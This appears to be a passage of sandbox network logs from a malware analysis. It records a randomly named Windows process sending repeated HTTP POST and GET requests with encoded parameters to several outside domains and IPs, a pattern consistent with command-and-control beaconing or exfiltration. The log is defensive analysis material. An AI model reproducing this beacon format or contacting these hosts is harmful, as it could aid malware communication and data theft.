                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Origin: http://www.fairmarty.top
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypkl1vA8TuAKvigcW7D6BnZWXmv5T13cTVERE85+btmbAPZBUJM2HqBYqONq8oiBdjKcb/ZarCkPQAgDmrHa4aDBoL8etzczU/VirsFa1dKwAmLcWb1VnQqdH/LDXXBUv24bpCTcBCHaurds507GzxLpwm8fEgc676I83CgDxN7gHEYMgrKo+cwNuMHUkQilnEHPo68mtkP9bh+HeUGf7z/kDVPI6aQ+g9qBozwxc/SEER5WpRD7XHHfPBCCDglgKZISkC8rOrM34vcnWN60bPbHNvbpN+zYfXXv39W0HuKxdeg75pak3hKJFd6W3NLKTepj75Mzo5QI86G3etkTyZQJg6GljNMpjNCX171BtGPX6h6V37L62dQb/tTGc+YD8x1/GDIsKrNtK3lNrcxfCsKXwz7W7Dctl4dlZjaAGNyF4r8WukLPT81XuEFxMi3dp50ZJgjCMGgaO+e6wCVk/+JnA1jV2iwM/n5XtV6S9bRwv2mbzVo7RrpwL2q3hRJCtiSO9vVX0LKajUNIBJV9Du4Cl4DzlrXeIKkGhxcwj70J1KmQgFY0Xa7YgY+al5JhfsXQ19IU5vaveXgabQqW99hsGEMAYEXPQzoaBLr2OHqT5p7vgaLhozv5rGtQdOfcmscB6A/qvImYmDcqmxCgMFR2oul78Cb6tfyKmivvH0pF5oyhQjUzuJJbI7LqBqA5XvDUx2jLI/ehxrmR+ZdY7x+hvhRQsBTc93E/OWW5/M7hIvKMd33RfqWIiJBLzF7OWtgNYojKUkXYc2uAnMJyZuewSq0BzgtrxHH0qaDKpL8PMmcfem/JGPzBX0Qt7B+r6fmeNS2NyccgJrbTSLf/eJk85sCgoZx+pIWvSLvWcG4A1xPdGXZmpf2XnhSLGxLN8zGuqP6RNzFXzESvpr6vPoOdsolL2BlMDhnuahGKLWV+SDyWOdfrJQhtgw7in5kLML+vQ5eE4L4xfI1KYdTpmzQZ0tgJzv840dYZSc/fnq7+/k+0V2cfW0pyMKcseKsy02ykUKqSnd4p6uvGmPWdLV+YnCKC0BVaLYLf7b/lfebHxlof7tPooL7ChTaDpTxGC/2N5ZWRXQF1x9S0sH1qIhGiqhKuVMf4dk7mW6IkYeiCOqnE4prXV9ekUxBBLYmCROanhjpemrPvFACRAEYvxcl7shwzHLMZhuvWOqTr51K3J5cdGLiC
                                                                                                                                                                          Apr 26, 2024 07:43:16.013987064 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:15 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          20 | 192.168.2.7 | 49746 | 203.161.46.103 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:18.530144930 CEST | 500 | OUT | GET /aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:43:18.729918957 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:18 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          21 | 192.168.2.7 | 49747 | 205.234.233.38 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:24.153331041 CEST | 780 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Origin: http://www.theertyuiergthjk.homes
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=HIl+5el3I85SWsu2P7xkKCH7PZOtiq+EU/kqod1eg12v4XS5cmfHMT9GNU0wuMWR63mbqIMBtVQ5yIz68ZAs9yhy2lIeahreR/o31q0eMbjpmB3IorL6C3QyR5GiOHJKN1GMBo+y7RQTqGtulv+aBBqqwArqld/lSGVtXB8qRUDb1d0BWjyA0Gfi70jTJrcant4HfXbHOQT2ckm04w==
                                                                                                                                                                          Apr 26, 2024 07:43:24.710182905 CEST | 697 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:24 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 552
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          22 | 192.168.2.7 | 49748 | 205.234.233.38 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:26.871974945 CEST | 800 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Origin: http://www.theertyuiergthjk.homes
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=HIl+5el3I85SXM+2McFkMiH6SpOtrK/NU/Yqocxo1XCv42O5djzHPT9GVE10gsWK63qiqJABtU05yJD68qYv8ihw7FJYUBreR/o31qg4MfHpmRHIv5z5eHQxQ5GiZ3JON1GUBpjd7T4TqHdul++ZIBrh+gr42fmJTl4SYhsiQ1LK5LpjMB+sqXnZ/2HleNBvls8fS1vmRn2cR2HwuEF8WUEoWG+dhzSOZ/ghCT4=
                                                                                                                                                                          Apr 26, 2024 07:43:27.411938906 CEST | 697 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:27 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 552
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          23 | 192.168.2.7 | 49749 | 205.234.233.38 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:29.591375113 CEST | 1813 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Origin: http://www.theertyuiergthjk.homes
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:43:30.138544083 CEST | 768 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:30 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 589
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Expires: 0
                                                                                                                                                                          Cache-control: private
                                                                                                                                                                          Data Ascii: Sorry, Page Not Found


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          24 | 192.168.2.7 | 49750 | 205.234.233.38 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:33.153696060 CEST | 509 | OUT | GET /aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:43:33.684631109 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:33 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 2455
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Last-Modified: Thu, 21 Mar 2024 08:53:17 GMT
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: "65fbf57d-997"
                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <title></title> <meta http-equiv="Cache-Control" content="max-age=180"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="format-detection" content="telephone=no"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0, shrink-to-fit=no, viewport-fit=cover"> <link rel="stylesheet" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/llc.css?ver=0002" /> <link rel="stylesheet" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/index.css?ver=0009" /> <link rel="stylesheet" type="text/css" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/hui/hui.css?v=0001" /> <link rel="stylesheet" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/animate.min.
Apr 26, 2024 07:43:33.684664011 CEST  1289               IN
                                                                                                                                                                          Data Ascii: css?v=20230919001"> <script type="text/javascript"> ~function () { var u = navigator.userAgent.toLowerCase(); if (u.indexOf('micromessenger') == -1 || u.indexOf('android') == -1) return; var matchs = u.match(/micromesse
Apr 26, 2024 07:43:33.684685946 CEST  165                IN
                                                                                                                                                                          Data Ascii: daily/back1.png" />-->... <span></span>-->... </div>-->...</div>--></body></html><style> #hui-dialog-msg{ color: #333333; }</style>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.7  49751        162.240.81.18   80                2912  C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe

Timestamp                             Bytes transferred  Direction  Data
Apr 26, 2024 07:43:39.407094002 CEST  765                OUT        POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Origin: http://www.aprovapapafox.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=rGJQ2I+FOOukznvK4UomL/Q+RE296L1uzb4KXnnQYb68hcvFWqdN5gEF1778QoEMkUGNNNVnAjCZz+7lpkr1WIRrAiuaxN9HiNWRWh7mFYjkF1t/va9N0ILdvgznzgjO+w8IpHrSq/PJpIYINGANJQSftSRDy/N3NzQyvAax3nnx66+glE+lmCjweNLtTCKvpqqfe67CT5WFdLLiUA==
Apr 26, 2024 07:43:39.603080034 CEST  1289               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:39 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Apr 26, 2024 07:43:39.603122950 CEST  1289               IN
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Apr 26, 2024 07:43:39.603161097 CEST  1245               IN
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.7  49752        162.240.81.18   80                2912  C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe

Timestamp                             Bytes transferred  Direction  Data
Apr 26, 2024 07:43:42.134452105 CEST  785                OUT        POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Origin: http://www.aprovapapafox.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpe8m4rFEupN+gEFhL7DUoELkUKFNMZnAjmZz6/lpTf2QYR1ICuU8t9HiNWRWgfMFbTkCEd/u79M1ILCugznlQjK+w8upDL0q5DJpJoINS0KDQSZgyQKyP4SEW4zmCqY4UmL2sjC/myJ4TbLaPvbEkXarruHTYPjMOzvQZqmC4V9vjWLqw3o83g8ONV3+3k=
Apr 26, 2024 07:43:42.330544949 CEST  1289               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:42 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Apr 26, 2024 07:43:42.330666065 CEST  1289               IN
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Apr 26, 2024 07:43:42.330717087 CEST  1245               IN
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.7  49753        162.240.81.18   80                2912  C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe

Timestamp                             Bytes transferred  Direction  Data
Apr 26, 2024 07:43:44.861347914 CEST  1798               OUT        POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Origin: http://www.aprovapapafox.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpW8hLjFHJ1N/gEF9b7GUoFOkViBNMF3AhuZyfrl4yf2ZYR1XyuVxN9SiM6VWhvMFbTkCGF/+a9M4oLdvgzrzgju+wlbpCL7qJjJqp4IAHAKPQSblyQSyPkBEQdKmCy24W2L05iuqHSTi13zEMC3HWauhoiLRZjdIND5UZi8WfV56hm9rzzrwi1LKfZJonApMu6R0iG49Snc8FnUJY7EnGJvqUk7aQEwVnK3KHdjBkgpfRrVkXUv3UsZY9FKUr0/d5eNMvvPxjg7fux/uWDjwViMzBFoWfbKvfFKol3JZhdPt9M9Y265xcTQectwzIKgHmzvhmOZD29KmqxPPZvwlXPchk994I7PLOsVZuwvNU16E4Bm84gqLwNfobgQUQRrooS/+qa/zP0Ybl/B+PnuLeJxuauc0d/PWBBTPfAqrnSQlJot77ZbhaNtg2/l9zWtrXKL2XxK0HrOC8q3WWCCENSlFr4OW86V0Ja8xik4AtvNTFuw2NTRO7hlfN5WqlwM3PeDA4S6X7PDtctOxr5OGL3CPaA5AXBiCbHCbenZwx8r2eNOMA3Vl1GMUn9lvWDCrB/DOexW2/+3THLhPJd9xVnYymW/j1Kw9SD+oUflqSDK2B9h3NqByxRhKEtnxfMFIWh1ReeXdFYP//hQUogzhjJaEDqt9etrOYNtwWRG87/eMiJdHQrs1oCHSr12RfHUNau8VplVzz+ME9y/lwsrq3tRaMbY1OV+BSyNS8dIRGoy+sEy2JyE8Dq0+R1tfHxLi6rwwXq2ZD9ZHtYQyLaTfZ6f95yppbvd2RvuFF1xMbMtcMa2j/0uiAuBmialBiNzJRhO2RwsTgnZXzDEGlmsfw7w1VSCj4bk/2iywlVgQZSdlIJ8U2JP0ksWTqrg4KlyrBZJze/ZZ0D3pCJCkkBli3/kHB9Tm9pxcrTAf9l7IhwP4/oqOqCR0SStXpUkquCFnd3GFUP7zO4lUDylmWiq2Z+ozLVAWNFvXETsZPylPsiqJmTgJpQ4Tt3zQ9lvStrJFp6mmcmrNUlLbBi5dkZJAdbvVdKv9xVX3AMhfKb63DPDSOnNiR2coDKRDxy5V+t0nutTvwUMGxcC96sTX7+iO6XLpVeoTMYZlBEowz5sMThni0Bgi/eY3IvWwrZBc4lE1gkWWMPWTRbSDROXWYM3p60GNDPUc8CfZDrtNECmGlrOH473ehw3
Apr 26, 2024 07:43:45.058047056 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:44 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Apr 26, 2024 07:43:45.058088064 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Apr 26, 2024 07:43:45.058135033 CEST | 1245 | IN
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 49754 | 162.240.81.18 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:43:47.579766989 CEST | 504 | OUT | GET /aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:43:47.775816917 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:47 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
